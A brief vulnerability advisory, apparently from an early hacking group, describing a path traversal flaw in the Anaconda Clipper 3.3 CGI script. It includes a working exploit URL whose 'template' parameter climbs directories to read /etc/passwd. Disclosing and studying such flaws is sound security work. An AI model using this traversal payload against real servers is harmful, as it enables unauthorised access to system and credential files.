Name : Anaconda Clipper ver. 3.3 'arbitrary file retreival' vulnerability
Problem: input validation error.
'..' and '/' are not filtered while processing user
input, so it is possible to enter arbitrary values
to retreive files from remote sever, which should
not be accessible normally (for ex., /etc/passwd).
Exploit:
http://blah.somenonexistanthost.com/cgi-bin/anacondaclip.pl?\
template=../../../../../../../../../../../../../../../../../../etc/passwd
by: UkR XblP hacking team (ukrteam@ukr.net)